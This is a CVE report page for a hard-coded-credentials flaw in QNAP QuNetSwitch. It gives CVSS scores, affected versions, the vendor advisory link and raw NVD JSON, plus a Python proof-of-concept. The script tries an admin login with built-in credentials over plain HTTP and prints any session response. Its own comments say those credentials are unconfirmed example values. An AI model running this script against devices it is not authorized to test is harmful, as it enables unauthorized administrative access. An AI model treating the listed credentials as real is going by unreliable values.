Security Vulnerability Report
CVE-2026-22900 CVSS 9.8 CRITICAL

CVE-2026-22900

Published: 2026-03-20 17:16:44
Last Modified: 2026-03-25 21:07:01

Description

A use of hard-coded credentials vulnerability (CWE-798) has been reported to affect QuNetSwitch. Remote attackers who exploit the vulnerability can gain unauthorized access. The vulnerability is fixed in the following version: QuNetSwitch 2.0.5.0906 and later.

CVSS Details

CVSS Score
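9.8 (CVSS 3.1, the Primary metric in the raw data below; the same record also carries a Secondary CVSS 4.0 score of 6.8 MEDIUM)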
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:qnap:qunetswitch:*:*:*:*:*:*:*:* - VULNERABLE
QuNetSwitch < 2.0.5.0906 (the CPE match in the raw data below starts at 2.0.1.13077, inclusive)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""Login check for CVE-2026-22900 (CWE-798, hard-coded credentials) in QuNetSwitch.

Posts one login request to a device and reports whether the built-in
credentials were accepted.  A positive result means the device is still on an
affected build and needs QuNetSwitch 2.0.5.0906 or later.

The username and password below are labelled "Example credential" in the
original listing, so they are not confirmed to be the real values.
"""
import requests
import sys


def exploit(target_ip):
    """Try the hard-coded login against ``target_ip`` and print the outcome.

    Args:
        target_ip: Host or IP of the device; it is interpolated directly into
            the ``http://<target_ip>/api/login`` URL.

    Returns:
        None.  The result is reported on stdout only.
    """
    # NOTE(review): the request goes over plain HTTP, so the credentials and
    # any session data in the reply cross the network unencrypted.
    login_endpoint = f"http://{target_ip}/api/login"
    form_fields = {
        "username": "admin",  # example value from the original listing
        "password": "quadmin_secret",  # example value from the original listing
    }

    print(f"[*] Attempting to login to {login_endpoint} using hardcoded credentials...")

    try:
        reply = requests.post(login_endpoint, data=form_fields, timeout=10)

        # Heuristic only: any 200 body containing "success" counts as a hit,
        # which also matches words such as "unsuccessful".  Confirm a positive
        # against the device's own session/audit log before acting on it.
        accepted = reply.status_code == 200 and "success" in reply.text.lower()
        if not accepted:
            # A miss is not proof of a patched device: wrong endpoint, wrong
            # example credentials and a filtered port all end up here too.
            print("[-] Exploit failed or patch applied.")
            return

        print("[+] Exploit successful! Logged in as Administrator.")
        # NOTE(review): the raw body is echoed and may contain a session token.
        print(f"[+] Response: {reply.text}")
    except Exception as err:
        # Connection errors and timeouts are reported, never raised.
        print(f"[!] Error: {err}")


if __name__ == "__main__":
    cli_args = sys.argv
    if len(cli_args) != 2:
        print(f"Usage: python3 {cli_args[0]} <target_ip>")
        sys.exit(1)
    exploit(cli_args[1])

References

https://www.qnap.com/en/security-advisory/qsa-26-11 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22900", "sourceIdentifier": "[email protected]", "published": "2026-03-20T17:16:44.467", "lastModified": "2026-03-25T21:07:01.093", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A use of hard-coded credentials vulnerability has been reported to affect QuNetSwitch. The remote attackers can then exploit the vulnerability to gain unauthorized access.\n\nWe have already fixed the vulnerability in the following version:\nQuNetSwitch 2.0.5.0906 and later"}, {"lang": "es", "value": "Se ha reportado una vulnerabilidad de uso de credenciales codificadas de forma rígida que afecta a QuNetSwitch. Los atacantes remotos pueden entonces explotar la vulnerabilidad para obtener acceso no autorizado.\n\nYa hemos corregido la vulnerabilidad en la siguiente versión:\nQuNetSwitch 2.0.5.0906 y posteriores"}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", 
"modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-798"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:qnap:qunetswitch:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.0.1.13077", "versionEndExcluding": "2.0.5.0906", "matchCriteriaId": "B43C9E36-951F-4020-B6E3-C7D4941ABC50"}]}]}], "references": [{"url": "https://www.qnap.com/en/security-advisory/qsa-26-11", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}